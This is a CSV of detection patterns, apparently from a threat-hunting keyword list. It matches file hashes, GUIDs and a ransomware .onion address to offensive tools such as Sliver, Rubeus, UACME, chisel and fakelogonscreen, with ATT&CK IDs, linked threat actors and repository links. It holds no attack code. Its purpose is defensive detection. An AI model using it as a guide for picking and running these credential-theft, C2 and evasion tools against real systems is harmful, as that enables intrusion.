"*e347df6964e8d7ac73e12d28773f260a80109fb1049bc106ae90800381927cee*",".{0,1000}e347df6964e8d7ac73e12d28773f260a80109fb1049bc106ae90800381927cee.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#filehash","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","41964"
"*e34e1d947623610df05776c55c67f5252dd01a0f21ed33dd48c4b0402f564173*",".{0,1000}e34e1d947623610df05776c55c67f5252dd01a0f21ed33dd48c4b0402f564173.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","41965"
"*e3566acdea5e02b0fe890bae209ad90ea24daa126ba85d00c4fcf0cd71c93ad2*",".{0,1000}e3566acdea5e02b0fe890bae209ad90ea24daa126ba85d00c4fcf0cd71c93ad2.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","41967"
"*e35cdc81954fb9701b5fd2f79300a5a6b2dd018e82aa733727a734b08ddd9715*",".{0,1000}e35cdc81954fb9701b5fd2f79300a5a6b2dd018e82aa733727a734b08ddd9715.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41969"
"*e363fb56b36aa94fa6f631c5a85401e3415fe23f5595f61d32f4828c84571882*",".{0,1000}e363fb56b36aa94fa6f631c5a85401e3415fe23f5595f61d32f4828c84571882.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41970"
"*e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61*",".{0,1000}e370fb7d05e5b2ede88b633c05b9b21aa073678c392dda6407c112afe3430a61.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41974"
"*e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214*",".{0,1000}e3731ce37c3e570254e35ac1201483592e708b43c898b3b21cca71a9f401d214.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41976"
"*e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed*",".{0,1000}e376445d4c432d5f3c61e4584974941028c2975b97ee1461e4f00c65eb09a0ed.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#filehash","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","41978"
"*e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2*",".{0,1000}e376d23f48816e9d9a8d74cc9f8891b6fed2cff46d2b0efe989d8272b05931f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","41979"
"*e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9*",".{0,1000}e379046040e17b60f1311e1d406a5bd9e34fd3f8b9e22cbceed612a6c3a689a9.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#filehash","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","41982"
"*e382edfe2f7c38cb3d6abd20c75e1ac24ddc19f921aba4b92dda3e1774e45240*",".{0,1000}e382edfe2f7c38cb3d6abd20c75e1ac24ddc19f921aba4b92dda3e1774e45240.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","#filehash","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","41983"
"*E383DFEA-EC22-4667-9434-3F2591A03740*",".{0,1000}E383DFEA\-EC22\-4667\-9434\-3F2591A03740.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#GUIDproject","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","41984"
"*e3991de30b4675d89877b4b22a36e71c1ac11b399e9b6826195e87354f4d6837*",".{0,1000}e3991de30b4675d89877b4b22a36e71c1ac11b399e9b6826195e87354f4d6837.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","#filehash","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","41985"
"*e39b03c7268e363e670b40a4c5e65d5c04fc82557ea2abaa57e0e9b7403bdf61*",".{0,1000}e39b03c7268e363e670b40a4c5e65d5c04fc82557ea2abaa57e0e9b7403bdf61.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","41986"
"*e39e2ee96b9f8bd34337c60dc9b8749f526a236664fefcf704180e818221daaa*",".{0,1000}e39e2ee96b9f8bd34337c60dc9b8749f526a236664fefcf704180e818221daaa.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","41987"
"*e3a0aa509ad07aab04f9a052a9abc681d414871cd0277deef4b95ea98f1243c8*",".{0,1000}e3a0aa509ad07aab04f9a052a9abc681d414871cd0277deef4b95ea98f1243c8.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","41988"
"*e3a16962b218dbe72cc43aea6c66bcf8234775ee159ec54f96758c6f4e019449*",".{0,1000}e3a16962b218dbe72cc43aea6c66bcf8234775ee159ec54f96758c6f4e019449.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","41989"
"*e3a6a5d97a13040f50b38542586dbe4cf664c10b6b4264f2f7d4d1c8caf2aeec*",".{0,1000}e3a6a5d97a13040f50b38542586dbe4cf664c10b6b4264f2f7d4d1c8caf2aeec.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41990"
"*e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df*",".{0,1000}e3a6fd1ebf5912045e94cbe9cf44ec388351c89aab2054a647332e41f70f27df.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41991"
"*e3a86bc310bc8b100658d86bc6c8541de89bdf340651ecc848d1aeb29bd27695*",".{0,1000}e3a86bc310bc8b100658d86bc6c8541de89bdf340651ecc848d1aeb29bd27695.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","41992"
"*e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2*",".{0,1000}e3a9b1c8dfe7bfcebd4d908f7cc36df8d09ee579ab10738308f0536782a14fe2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","41994"
"*E3AEA3F6-D548-4989-9A42-80BAC9321AE0*",".{0,1000}E3AEA3F6\-D548\-4989\-9A42\-80BAC9321AE0.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41995"
"*e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a*",".{0,1000}e3b434dad7f4330a5402271014b6a450ecf998aa10d66c640798d5b1d057639a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","41996"
"*e3b8202dd0e456299e6c11495357e0e540ad0c73ff73723783b968d3d28c02ac*",".{0,1000}e3b8202dd0e456299e6c11495357e0e540ad0c73ff73723783b968d3d28c02ac.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","41997"
"*e3bd611e8aa3d18d81944ebdabf51ce9aed8eb414a95ee8eb6d45ca0ebd58003*",".{0,1000}e3bd611e8aa3d18d81944ebdabf51ce9aed8eb414a95ee8eb6d45ca0ebd58003.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","42000"
"*e3c47e6fe49e0f3905ba47ee21daff40a53ac9c2d18eb452a27812ef054a4cdc*",".{0,1000}e3c47e6fe49e0f3905ba47ee21daff40a53ac9c2d18eb452a27812ef054a4cdc.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","42002"
"*e3c611553b1544143dd625f75395d57ed0ccc260dc0e6d0204b512a492957050*",".{0,1000}e3c611553b1544143dd625f75395d57ed0ccc260dc0e6d0204b512a492957050.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","42004"
"*e3dd6fc036a50de83adba7789cd49d29da75622b4c0f84e0fad8ad97f8880446*",".{0,1000}e3dd6fc036a50de83adba7789cd49d29da75622b4c0f84e0fad8ad97f8880446.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42005"
"*e3de5481632991feec94a6faf2404118c5b8ee31e74fe54594cec8bf2d03c99d*",".{0,1000}e3de5481632991feec94a6faf2404118c5b8ee31e74fe54594cec8bf2d03c99d.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","42006"
"*e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba*",".{0,1000}e3e2ced2569d1ebef8f65b554979747881e5e060355fa6698c913036dfd892ba.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","42007"
"*e3e70157c3a75c549870c5f2796a64c8de05c3d9f71fbcf76239f07875bff829*",".{0,1000}e3e70157c3a75c549870c5f2796a64c8de05c3d9f71fbcf76239f07875bff829.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","42008"
"*e3e89eb47f5d2fec9f3fb1b32e0100d95d4a28d33f85966c217d5a859d4cab94*",".{0,1000}e3e89eb47f5d2fec9f3fb1b32e0100d95d4a28d33f85966c217d5a859d4cab94.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42009"
"*e3f63a8456b106e6e8c4801f2c061b1c8d2a205dc3c161e27ead03abbd960300*",".{0,1000}e3f63a8456b106e6e8c4801f2c061b1c8d2a205dc3c161e27ead03abbd960300.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42010"
"*e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc*",".{0,1000}e3f64597d5022d8716f45ffe57fb9f5f25ff64f42b9b61a0a64cb4521a453ebc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42011"
"*e3f71f6245226059b306c744af8038d045104c2a12aef8f6b6a254d963927e68*",".{0,1000}e3f71f6245226059b306c744af8038d045104c2a12aef8f6b6a254d963927e68.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","0","#filehash","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","42012"
"*e3v6tjarcltwc4hdkn6fxnpkzq42ul7swf5cfqw6jzvic4577vxsxhid.onion*",".{0,1000}e3v6tjarcltwc4hdkn6fxnpkzq42ul7swf5cfqw6jzvic4577vxsxhid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","42013"
"*e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2*",".{0,1000}e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","42014"
"*e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2*",".{0,1000}e403c105e8167585b1c431cdc86c943a8f93e876b3940668d088b976d8a1e9a2.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","42015"
"*e409901ebcba3869ad50844d6896bc466ef54546ceb06bd5949d9f667ade3e06*",".{0,1000}e409901ebcba3869ad50844d6896bc466ef54546ceb06bd5949d9f667ade3e06.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","42017"
"*e409a2e884393295c0b3c0e46b918c4b96ce535bbb9c5f81a21946198f6615cf*",".{0,1000}e409a2e884393295c0b3c0e46b918c4b96ce535bbb9c5f81a21946198f6615cf.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42018"
"*e415296f956351bc4060d03fa52512415f353e26236b7fd97642f7ef608ca4e9*",".{0,1000}e415296f956351bc4060d03fa52512415f353e26236b7fd97642f7ef608ca4e9.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#filehash","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","42021"
"*e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7*",".{0,1000}e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42023"
"*e4221478f87a8403a8db34b908d0b1d42e4b76cec95835364d2310b77cc2615d*",".{0,1000}e4221478f87a8403a8db34b908d0b1d42e4b76cec95835364d2310b77cc2615d.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","42025"
"*e42d27145528616d6fe1951421989dbdaf174abe860b90bdc9321f1093593a71*",".{0,1000}e42d27145528616d6fe1951421989dbdaf174abe860b90bdc9321f1093593a71.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","42026"
"*e42e1a7fcd23299df2ad4a3fe66e0f1df5a367ffe96015fd3a3b9c0a6dfcefdb*",".{0,1000}e42e1a7fcd23299df2ad4a3fe66e0f1df5a367ffe96015fd3a3b9c0a6dfcefdb.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","#filehash","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","42027"
"*e42e5cf9-be25-4011-9623-8565b193a506*",".{0,1000}e42e5cf9\-be25\-4011\-9623\-8565b193a506.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","#GUIDproject","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","42028"
"*e43124c3412c5ced1b7c4ba34ecb012904d8b967be3a3ea0f5da507518c1f6a8*",".{0,1000}e43124c3412c5ced1b7c4ba34ecb012904d8b967be3a3ea0f5da507518c1f6a8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42029"
"*e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838*",".{0,1000}e43289578251611f4f6f9952fa6ec598ed69b71c60ddc9077e69495fce018838.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42030"
"*e43f95f83949e27b099ea863b18f8fdb42d5c50d58f846051fa15c0cd2e9d491*",".{0,1000}e43f95f83949e27b099ea863b18f8fdb42d5c50d58f846051fa15c0cd2e9d491.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","42032"
